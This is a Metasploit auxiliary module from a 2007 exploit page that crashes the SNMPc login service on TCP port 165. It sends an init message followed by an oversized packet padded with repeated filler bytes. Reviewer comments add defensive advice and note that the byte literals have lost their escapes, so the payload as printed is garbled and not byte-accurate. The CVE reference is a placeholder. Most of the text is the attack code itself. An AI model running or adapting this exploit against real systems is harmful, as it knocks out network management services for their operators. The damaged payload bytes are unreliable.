
# Title : SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)
# Published : 2007-06-04
# Author : En Douli


##
# $Id: snmpc.rb  2007-06-03  $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

# Metasploit auxiliary module which, per its own description, sends a crafted
# packet to the SNMPc login service and causes a denial of service.
# The page title gives the affected range as SNMPc <= 7.0.18.
#
# Reviewer notes for defenders:
# - The only effect the module claims is loss of availability of the service.
# - The default target is TCP port 165 (see register_options below), so
#   limiting that port to trusted management hosts reduces exposure.
# - The second message sent in #run is dominated by a long repeated filler,
#   so an unusually large login-stage message on this port is the trait to
#   look for in traffic or logs.
# - NOTE(review): as printed on this page the packet literals contain no
#   backslash escapes, so Ruby reads them as plain text rather than binary
#   bytes. The listing looks extraction-damaged and should not be treated as
#   a byte-accurate record of the traffic.
class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary

	# Supplies the TCP client helpers used in #run (connect, sock, disconnect).
	include Exploit::Remote::Tcp

	# Registers the module metadata and the default remote port.
	#
	# info - optional Hash merged into the metadata below via update_info.
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'SNMPc ',
			'Description'    => %q{
				This module sends a specially-crafted packet to the service login of snmpc 
				causing a denial of service of snmpc.
			},
			'Author'         => [ 'En Douli, Tks to OaiTeam <DouliEn@gmail.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					# Placeholder left by the author; no real CVE identifier is
					# given anywhere on this page.
					[ 'CVE', 'XXXXXXX' ],
				]))
			
			# Default remote port for the module is 165.
			register_options([Opt::RPORT(165),], self.class)
	end

	# Opens one TCP connection, writes two messages back to back, then closes
	# the connection. No reply is read and nothing checks whether the service
	# actually stopped responding.
	def run
		connect
		# First message, sent before the oversized one (presumably session
		# setup; TODO confirm against the protocol).
		init = "x14x00x00x00x70xa9x00x00x51x03x00x00x02x00x00x00x72x63x6fx6e"
		# Second message: a short leading section followed by a long repeated
		# filler. The size of this field, rather than its content, appears to
		# be what the service mishandles (TODO confirm with the vendor advisory).
		pkt = "x29x00x00x00xbcxeex00x00x52x03x00x00x02x00x00x00x41x64x6dx69x6ex69x73x74x72x61x74"
		pkt << "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" * 56
		pkt << "x41x41x41x41x41x41x41x41x41x09"
		pkt << "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41" * 35
		pkt <<	 "x41x41x41x41x41x41x41x41x09x30x00"
		
		print_status("Sending dos packet ... ")
		
		# Both writes go out on the same connection, init first.
		sock.put(init)
		sock.put(pkt)
		
		disconnect
	end

end
end	
